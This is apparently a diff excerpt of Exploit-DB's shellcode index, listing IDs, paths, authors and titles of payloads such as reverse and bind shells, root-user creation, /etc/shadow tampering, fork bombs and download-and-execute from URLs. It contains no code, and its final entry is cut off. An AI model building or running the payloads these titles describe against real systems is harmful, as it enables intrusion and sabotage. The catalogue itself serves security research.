-13532,shellcodes/win_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,win_x86,shellcode, -13533,shellcodes/win_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,win_x86-64,shellcode, -13548,shellcodes/lin_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,lin_x86,shellcode, -13549,shellcodes/lin_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,lin_x86,shellcode, -13550,shellcodes/lin_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,lin_x86,shellcode, -13551,shellcodes/lin_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode, -13553,shellcodes/lin_x86/13553.c,"Linux/x86 - execve Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",lin_x86,shellcode, -13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,windows,shellcode, -13563,shellcodes/lin_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,lin_x86,shellcode, -13565,shellcodes/win_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,win_x86,shellcode, -13566,shellcodes/lin_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,lin_x86,shellcode, -13569,shellcodes/win_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,win_x86,shellcode, -13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,freebsd_x86,shellcode, -13571,shellcodes/win_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,win_x86,shellcode, -13572,shellcodes/lin_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,lin_x86,shellcode, -13574,shellcodes/win_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",win_x86,shellcode, -13576,shellcodes/lin_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,lin_x86,shellcode, -13577,shellcodes/lin_x86/13577.txt,"Linux/x86 - setuid + Break chroot (mkdir/chdir/chroot '...') + execve /bin/sh Shellcode (79 bytes)",2009-12-30,root@thegibson,lin_x86,shellcode, -13578,shellcodes/lin_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,lin_x86,shellcode, -13579,shellcodes/lin_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes)",2009-12-31,sandman,lin_x86,shellcode, -13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,windows,shellcode, -13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,windows,shellcode, -13586,shellcodes/lin_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,lin_x86,shellcode, -13595,shellcodes/win_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,win_x86,shellcode, -13599,shellcodes/lin_x86/13599.txt,"Linux/x86 - ip6tables -F Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode, -13600,shellcodes/lin_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode, -13601,shellcodes/lin_x86/13601.txt,"Linux/i686 - pacman -S (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode, -13602,shellcodes/lin_x86/13602.txt,"Linux/i686 - pacman -R Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",lin_x86,shellcode, -13609,shellcodes/lin_x86/13609.c,"Linux/x86 - execve /bin/cat /etc/passwd Shellcode (43 bytes)",2010-02-09,fb1h2s,lin_x86,shellcode, -13614,shellcodes/win_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode, -13615,shellcodes/win_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",win_x86,shellcode, -13627,shellcodes/lin_x86/13627.c,"Linux/x86 - execve /bin/sh Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",lin_x86,shellcode, -13628,shellcodes/lin_x86/13628.c,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (2)",2010-02-27,ipv,lin_x86,shellcode, -13630,shellcodes/win_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",win_x86,shellcode, -13631,shellcodes/win_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",win_x86,shellcode, -13632,shellcodes/lin_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,lin_x86,shellcode, -13635,shellcodes/win_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",win_x86,shellcode, -13636,shellcodes/win_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",win_x86,shellcode, -13639,shellcodes/win_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,win_x86,shellcode, -13642,shellcodes/win_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,win_x86,shellcode, -13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode, -13647,shellcodes/win_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode, -13648,shellcodes/win_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode, -13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",windows,shellcode, -13661,shellcodes/lin_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,lin_x86,shellcode, -13669,shellcodes/lin_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode, -13670,shellcodes/lin_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,lin_x86-64,shellcode, -13671,shellcodes/lin_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode, -13673,shellcodes/lin_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode, -13675,shellcodes/lin_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,lin_x86,shellcode, -13676,shellcodes/lin_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,lin_x86,shellcode, -13677,shellcodes/lin_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,lin_x86,shellcode, -13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,generator,shellcode, -13680,shellcodes/lin_x86/13680.c,"Linux/x86 - Fork Bomb Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode, -13681,shellcodes/lin_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",lin_x86,shellcode, -13682,shellcodes/lin_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,lin_x86,shellcode, -13688,shellcodes/lin_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,lin_x86-64,shellcode, -13691,shellcodes/lin_x86-64/13691.c,"Linux/x86-64 - execve /bin/sh Shellcode (30 bytes)",2010-04-25,zbt,lin_x86-64,shellcode, -13692,shellcodes/lin_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,lin_x86,shellcode, -13697,shellcodes/lin_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",lin_x86,shellcode, -13698,shellcodes/lin_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",lin_x86,shellcode, -13699,shellcodes/win_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,win_x86,shellcode, -13702,shellcodes/lin_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",lin_x86,shellcode, -13703,shellcodes/lin_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode, -13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode, -13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",solaris_x86,shellcode, -13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",solaris_x86,shellcode, -13711,shellcodes/solaris_x86/13711.c,"Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)",2010-05-25,"Jonathan Salwan",solaris_x86,shellcode, -13712,shellcodes/lin_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",lin_x86,shellcode, -13715,shellcodes/lin_x86/13715.c,"Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,lin_x86,shellcode, -13716,shellcodes/lin_x86/13716.c,"Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,lin_x86,shellcode, -13719,shellcodes/win_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,win_x86-64,shellcode, -13722,shellcodes/lin_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,lin_x86,shellcode, -13723,shellcodes/lin_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode, -13724,shellcodes/lin_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode, -13725,shellcodes/lin_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode, -13726,shellcodes/lin_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,lin_x86,shellcode, -13728,shellcodes/lin_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode, -13729,shellcodes/win_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode, -13730,shellcodes/lin_x86/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode, -13731,shellcodes/lin_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode, -13732,shellcodes/lin_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode, -13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode, -13742,shellcodes/lin_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode, -13743,shellcodes/lin_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode, -14334,shellcodes/lin_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode, -13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode, -13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode, -13908,shellcodes/lin_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode, -13910,shellcodes/lin_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode, -13915,shellcodes/lin_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode, -13943,shellcodes/lin_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",lin_x86-64,shellcode, -14014,shellcodes/win_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode, -14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode, -14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,windows,shellcode, -14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode, -14119,shellcodes/lin_x86/14119.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode, -14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode, -14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode, -14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode, -14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode, -14216,shellcodes/lin_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode, -14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode, -14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode, -14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode, -14234,shellcodes/linux/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode, -14235,shellcodes/linux/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode, -14261,shellcodes/generator/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",generator,shellcode, -14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode, -14288,shellcodes/win_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode, -14305,shellcodes/lin_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode, -14332,shellcodes/lin_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode, -14691,shellcodes/lin_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,lin_x86,shellcode, -14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",windows,shellcode, -14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode, -14873,shellcodes/win_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,win_x86,shellcode, -14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode, -15063,shellcodes/win_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,win_x86,shellcode, -15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode, -15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode, -15202,shellcodes/win_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode, -15203,shellcodes/win_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode, -15314,shellcodes/arm/15314.asm,"ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode, -15315,shellcodes/arm/15315.asm,"ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode, -15316,shellcodes/arm/15316.asm,"ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode, -15317,shellcodes/arm/15317.asm,"ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode, -15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode, -15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode, -15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",generator,shellcode, -15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,win_x86,shellcode, -16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,generator,shellcode, -16026,shellcodes/bsd_x86/16026.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,bsd_x86,shellcode, -16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode, -17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode, -17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode, -17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode, -17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode, -20195,shellcodes/lin_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode, -17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",generator,shellcode, -17371,shellcodes/lin_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode, -17439,shellcodes/sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode, -17545,shellcodes/win_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode, -17559,shellcodes/lin_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode, -17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,osx,shellcode, -17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode, -17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,generator,shellcode, -18154,shellcodes/sh4/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode, -18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode, -18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode, -18197,shellcodes/lin_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode, -18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,linux_mips,shellcode, -18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode, -18294,shellcodes/lin_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode, -18379,shellcodes/lin_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode, -18585,shellcodes/lin_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode, -18885,shellcodes/lin_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode, -20196,shellcodes/lin_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode, -21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode, -21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode, -21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,arm,shellcode, -40363,shellcodes/win_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode, -22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode, -40890,shellcodes/win_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode, -23622,shellcodes/lin_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode, -24318,shellcodes/windows/24318.c,"Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode, -25497,shellcodes/lin_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode, -40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode, -27132,shellcodes/hardware/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode, -27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode, -40827,shellcodes/lin_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode, -28474,shellcodes/lin_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode, -40334,shellcodes/win_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode, -28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode, -29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 